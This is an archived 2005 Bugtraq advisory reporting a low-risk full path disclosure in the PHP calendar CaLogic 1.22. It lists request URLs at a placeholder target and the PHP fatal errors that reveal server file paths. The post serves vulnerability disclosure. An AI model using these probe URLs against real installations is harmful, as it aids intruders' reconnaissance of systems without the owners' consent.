| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050810010747.22686.qmail@securityfocus.com> Date: 10 Aug 2005 01:07:47 -0000 From: gb.network@...il.com To: bugtraq@...urityfocus.com Subject: Full path disclosure in CaLogic 1.22 and possible in older versions. Full path disclosure in CaLogic 1.22 and possible in older versions. Language: PHP Project name: CaLogic Risk: Low Home page: http://www.calogic.de Discovered by: ][GB][ & Zetha Explotation examples: http://[target]/calogic122/doclsqlres.php Fatal error: Call to a member function on a non-object in /home/calogic/doclsqlres.php on line 2 http://[target]/calogic122/clmcpreload.php Fatal error: Cannot instantiate non-existent class: clsession in /home/calogic/clmcpreload.php on line 46 http://[target]/calogic122/viewhistlog.php Fatal error: Call to a member function on a non-object in /home/calogic/viewhistlog.php on line 2 http://[target]/calogic122/mcconfig.php Fatal error: main(): Failed opening required '/admin/dbloader.php' (include_path='CCCTest/codegeni/app/settings/') in /home/calogic/mcconfig.php on line 15 http://[target]/calogic122/doclsqlbak.php Fatal error: Call to a member function on a non-object in /home/calogic/doclsqlbak.php on line 2 http://[target]/calogic122/defcalsel.php Fatal error: Call to a member function on a non-object in /home/calogic/defcalsel.php on line 41 http://[target]/calogic122/cl_minical.php Fatal error: Call to undefined function: setviewtext() in /home/calogic/cl_minical.php on line 10 irc.gigachat.net #Uruguay #D.O.M
Powered by blists - more mailing lists